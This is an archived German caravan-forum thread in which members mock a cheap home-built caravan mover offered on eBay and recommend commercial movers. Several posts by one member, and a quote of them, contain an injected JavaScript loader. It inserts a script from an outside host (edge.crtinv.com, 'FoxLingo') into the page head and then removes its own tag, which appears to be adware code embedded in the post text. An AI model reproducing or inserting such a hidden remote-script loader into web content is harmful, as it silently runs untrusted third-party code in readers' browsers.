PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Mover selbst gemacht



gegei23
31.08.2012, 21:58
Hallo an Alle,

bin auf meiner Suche nach einem Mover für unseren WW hier im Forum vom Mitglied Fee auf dieses Angebot in Ebay Aufmerksam gemacht worden.

Was haltet Ihr davon??

Link: http://www.ebay.at/itm/Wohnwagen-Anhanger-Rangierhilfe-Mover-2000Kg-12V-Fernbedienung-/221117289878?pt=Reisemobil_Caravan_Teile&hash=item337b9e1596

LG
Georg
PS: Nochmasl Danke an Fee

Herbert34
01.09.2012, 07:29
Also ich stelle mir das sehr umständlich vor.
Erstens musst du immer 220Volt in der Nähe haben,dann ist dir natürlich aich dauernd das Kabel im weg und ich glaube nicht das du es schaffst die Seilwinde zu betätigen und gleichzeitig nur mit dem Stützrad zu lenken.
lg
Herbert

Sahli
01.09.2012, 08:58
Also ich stelle mir das sehr umständlich vor.
Erstens musst du immer 220Volt in der Nähe haben,dann ist dir natürlich aich dauernd das Kabel im weg und ich glaube nicht das du es schaffst die Seilwinde zu betätigen und gleichzeitig nur mit dem Stützrad zu lenken.
lg
Herbert
warum 230v er funktionier mit 12 v wie in der beschreibung zu lesen. das lenken allerdings ist wahrscheinlich nicht so leicht wie bei einem herkömmlichen mover

Helmi
01.09.2012, 09:35
Haben Wohnwagen das Stützrad nicht immer Links, damit der Wohnwagen, wenn er sich mal abhängt, nicht im Gegenvervehr läuft?

Da könnte man doch das Ding nicht immer dran lassen, wie der Verkäufer sagt.
Das Rad wäre nicht hoch genug zu ziehen, da der Motor an der Deichsel stößt.

Wienerwald-Jo
01.09.2012, 10:55
Hallo an Alle,

bin auf meiner Suche nach einem Mover für unseren WW hier im Forum vom Mitglied Fee auf dieses Angebot in Ebay Aufmerksam gemacht worden.

Was haltet Ihr davon??

Link: http://www.ebay.at/itm/Wohnwagen-Anhanger-Rangierhilfe-Mover-2000Kg-12V-Fernbedienung-/221117289878?pt=Reisemobil_Caravan_Teile&hash=item337b9e1596

LG
Georg
PS: Nochmasl Danke an Fee

:confused:so a Klumpert sieht man selten:confused:
Jo

stefferl
01.09.2012, 11:47
Wenn er das Ding erst vor 3 Wochen gebaut und in Kroatien verwendet hat, warum verkauft er es dann?:confused:

grisu
01.09.2012, 12:37
Wenn er das Ding erst vor 3 Wochen gebaut und in Kroatien verwendet hat, warum verkauft er es dann?:confused:

Ganz einfach, weil das Spielzeug nicht funktioniert.
Die Dinger gibts in den diversen Gratisbörsen immer wieder, weil die Leute damit höchst unzufrieden sind und dieses Zeug nach kurzer Zeit wieder loswerden will ;)

Entweder man gönnt sich bewusst so ein Teil oder man sollte darauf verzichten.
Bei so hohen Anforderungen wie sie bei einer Rangierhilfe notwendig sind, sind Billigteile sehr schnell überfordert und auch das (gar nicht so ) wenige Geld nicht wert.
Ein großer Autozubehörhändler hat in den vergangenen Jahren Billigmover angeboten und davon unzählige zurüchnehmen müssen weil sie extrem anfällig waren (Steuerung defekt, Rollen zu schwach usw.)
Bei Rangierhilfen die oft weit mehr als eine Tonne auch unter widrigen Verhältnissen (Nässe, weicher Untergrund, Steigungen usw.) sicher, kraftvoll und vor allem Milimetergenau steuern sollen haben halt ihren Preis.
Hier gilt wie so oft, man bekommt genau das was man bezahlt ;)

derfranze
01.09.2012, 17:54
Haben Wohnwagen das Stützrad nicht immer Links, damit der Wohnwagen, wenn er sich mal abhängt, nicht im Gegenverkehr läuft?

Da könnte man doch das Ding nicht immer dran lassen, wie der Verkäufer sagt.
Das Rad wäre nicht hoch genug zu ziehen, da der Motor an der Deichsel stößt.

Das Stützrad ist nur für das Rangieren von Hand vorgesehen. Beim Abreißen des Anhängers muss dieser mittels Selbstbremsvorrichtung (bei Wowa ist es meist eine Reißseilbremse) zum Stillstand kommen. Der weg den der WoWa dann nimmt hängt ausschließlich von der geichmäßigen Wirkung der Bremse ab.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

derfranze
01.09.2012, 17:59
Wenn er das Ding erst vor 3 Wochen gebaut und in Kroatien verwendet hat, warum verkauft er es dann?:confused:

Weil alle diese Antriebe den Nachteil haben, dass sie:
a) von einer hohen Deichsellast abhängig sind - die z.B. ein Tandemachser leicht aufbringt
b) oder selbst durch Batterien so schwer sind, dass sie den Anhänger bewegen können.
Die meisten dieser Systeme greifen aber in den Kugelkopf ein.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

Hobbycamper
01.09.2012, 21:57
Vergiss das Ding,
ich habe den Truma, tolles Ding, kostet halt auch entsprechend, habe auch schon billigere Mover wie z-B. Enduro etc. gesehen, diese kosten die Hälfte vmn Truma und funktionierten auch. Wenn du günstig kaufen willst, dann schau mal bei großen Obe.... in NL nach

derfranze
02.09.2012, 00:34
Hab ich in Ebay gefunden, eine Einachszugmaschine umgebaut zum Mover

http://www.ebay.de/itm/Rangierhilfe-Mover-/300771906133?pt=DE_Auto_Motorrad_Fahrzeuge_PKW_Anh %C3%A4nger&hash=item4607671255

das Ding scheint sich bereits im schweren Gelände bewährt zu haben :D:D:D


lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();!function( ){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

gegei23
02.09.2012, 23:17
Hab ich in Ebay gefunden, eine Einachszugmaschine umgebaut zum Mover

http://www.ebay.de/itm/Rangierhilfe-Mover-/300771906133?pt=DE_Auto_Motorrad_Fahrzeuge_PKW_Anh %C3%A4nger&hash=item4607671255

das Ding scheint sich bereits im schweren Gelände bewährt zu haben :D:D:D


lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();!function( ){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();


Wahnsinn :D:D
was den Leuten alles einfällt, ich glaube das wäre eher etwas für einen CP-Betreiber der in Sumpfnähe ist:D.

Das Ding aus dem Ebay wollte ich sowieso nicht kaufen, es geht ja nichts über einen Mover im herkömlichem Sinn.
Bin da beim Obe... in NL schon fündig geworden. Mir gefällt einfach der Ideenreichtum Anderer.
Auch deswegen bin ich schon einige Jahre Camper, da man doch immer wieder unglaubliches sieht und hört.

LG
Georg